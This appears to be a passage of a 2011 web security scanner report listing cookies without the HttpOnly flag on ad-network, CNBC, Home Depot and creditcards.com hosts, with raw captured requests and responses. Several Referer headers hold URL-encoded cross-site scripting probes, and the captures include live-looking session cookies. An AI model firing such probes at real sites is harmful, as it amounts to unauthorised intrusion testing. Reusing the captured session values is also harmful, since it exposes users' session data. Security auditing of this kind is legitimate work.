Date: Fri, 17 Jun 2011 10:10:54 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Connection: close
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=d14f5599fcc427d0b6d779a18539; Path=/
Content-Length: 646

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110617061054" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0"
...[SNIP]...

11.2. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8e98408250544b8c921948198003; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110616104458 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308235498620&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD; JSESSIONID=8e9837aa4dac5ae5113aef2f8e3b

Response

11.3. http://cts-log.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cts-log.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionstamp=73D45830-0435-B8E0-F460-B64B91036565;Domain=.channelintelligence.com;Expires=Thu, 16-Jun-11 13:32:18 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.4. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=1041BD66C9B7C74AE39CEFC5E2980294; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

11.5. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F794E24AA5C6E9C9B7908B9876B4AC42; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

11.6. http://lightsquared.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://lightsquared.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=1fbu0d3slrnqgcfo9bckmhde64; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: lightsquared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Jun 2011 10:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Set-Cookie: PHPSESSID=1fbu0d3slrnqgcfo9bckmhde64; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.lightsquared.com/xmlrpc.php
Location: http://www.lightsquared.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

11.7. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DotomiSession_2339=2_371600778172398468$330100732990473967$335422886$1308223767741; Domain=.dotomi.com; Path=/
DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Sat, 15-Jun-2013 11:29:27 GMT; Path=/
DotomiNet=2$DjQqblZ1RXhGA2JYBQV8XglHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLSkhaY2Reem1kVH9RLwVZaVwXXjkZDVJ%2BewJzA08IWWJWU0x0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Sat, 15-Jun-2013 11:29:27 GMT; Path=/
DotomiRR2339=-1$3$1$; Domain=.dotomi.com; Expires=Fri, 17-Jun-2011 11:29:27 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.8. http://pixel.adsafeprotected.com/jspix previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A3B01423A1106A1A8C78598547B9659F; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=124&pubId=test2&advId=netflix&campId=banner HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

11.9. http://pixel.everesttech.net/1688/i previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.everesttech.net
Path:	/1688/i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

everest_session_v2=4exN@kdiNH4AAIVh; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~nqpN0lLRpx4AAMT1; path=/; domain=.everesttech.net; expires=Fri, 21-Jun-2030 04:51:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.10. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACRRADAS=JLHBNFECIHFODOIEALAEHKFD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=57386690&d_id=THD HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253Ea4a06%253balert%25281%2529%252f%252fb77fcd64d48&omni=3&selectedCatgry=SEARCH+ALL
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; ASPSESSIONIDSQSQRATA=PJOLLFECKOBKMPAFOFJDLMGB; HumanClickACTIVE=1308225615809

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:12:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Wed, 15 Jun 2011 17:40:39 GMT
Content-Length: 9920
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDACRRADAS=JLHBNFECIHFODOIEALAEHKFD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}
lpMTagConf
...[SNIP]...

11.11. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQSQRATA=PJOLLFECKOBKMPAFOFJDLMGB; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=57386690&d_id=THD HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL
Cookie: LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:00:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Wed, 15 Jun 2011 17:40:39 GMT
Content-Length: 9920
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQSQRATA=PJOLLFECKOBKMPAFOFJDLMGB; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}
lpMTagConf
...[SNIP]...

11.12. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSATCSRS=OJGOIMECCCJCNEGDOCLBGIKK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=57386690&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253Ea4a06%253balert%25281%2529%252f%252fb77fcd64d48&omni=3&selectedCatgry=SEARCH+ALL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQDCBQQS=BBDCNFECICEINMCNLKOLMPBG; HumanClickACTIVE=1308225353876
If-Modified-Since: Wed, 15 Jun 2011 17:40:39 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:11:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Wed, 15 Jun 2011 17:40:39 GMT
Content-Length: 9920
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQSATCSRS=OJGOIMECCCJCNEGDOCLBGIKK; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}
lpMTagConf
...[SNIP]...

11.13. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSSABSQCB=IBNDBPKANPMDGKFGDEHLENMA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=57386690&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Wed, 15 Jun 2011 17:40:39 GMT
Content-Length: 9920
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSSABSQCB=IBNDBPKANPMDGKFGDEHLENMA; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}
lpMTagConf
...[SNIP]...

11.14. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CA740C97DEF71F3834F11695E893F650; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:10:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=CA740C97DEF71F3834F11695E893F650; Path=/
Cache-Control: max-age=10
Expires: Fri, 17 Jun 2011 10:11:07 GMT
Content-Length: 96
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_vi":"[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]"}});

11.15. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=1308233337|1308233338; path=/; domain=.mookie1.com
id=2814750682866683; path=/; expires=Tue, 10-Jul-12 14:08:58 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.16. http://ttwbs.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ttwbs.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionstamp=9FD5284E-7FB9-9193-8558-F46CA7311DDA;Domain=.channelintelligence.com;Expires=Thu, 16-Jun-11 16:52:16 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.17. http://www.creditcards.com/actions/clickBack.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.creditcards.com
Path:	/actions/clickBack.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=06bc19f3ec52a549e2f210cdf64332c7; path=/
Apache=66.219.46.81.1308307493411947; path=/
SSBAL=node.web2; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /actions/clickBack.php?t=a8111b6031d7e395537008d5382fbee2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:44:53 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: Apache=66.219.46.81.1308307493411947; path=/
Set-Cookie: PHPSESSID=06bc19f3ec52a549e2f210cdf64332c7; path=/
Set-Cookie: SSBAL=node.web2; path=/

11.18. http://www.creditcards.com/oc/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=3505ddb88b8e35ce83dc1c55fc0a557f; path=/
Apache=66.219.46.81.1308307377279509; path=/
cardOfferHistory=deleted; expires=Thu, 17-Jun-2010 10:42:56 GMT; path=/
SSBAL=node.web2; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oc/?pid=22145581&pg=1477&pgpos=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:57 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=998&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=&ref=&oid=1022011061705425735002421&data3=0&sid=1889&c=22145581
Vary: Accept-Encoding
Content-Length: 3102
Content-Type: text/html
Set-Cookie: Apache=66.219.46.81.1308307377279509; path=/
Set-Cookie: PHPSESSID=3505ddb88b8e35ce83dc1c55fc0a557f; path=/
Set-Cookie: cardOfferHistory=deleted; expires=Thu, 17-Jun-2010 10:42:56 GMT; path=/
Set-Cookie: SSBAL=node.web2; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...

11.19. http://www.creditcards.com/xtrack.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.creditcards.com
Path:	/xtrack.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=1fd19d3bf56b479370ee4eb0292dea6e; path=/; domain=.creditcards.com
Apache=66.219.46.81.1308307493539892; path=/
SSBAL=node.web2; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.20. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223868476%3a%3bC25%5fEXP%3d1360063868%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:31:08 GMT;Path=/
THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:31:08 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85e5b7-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; 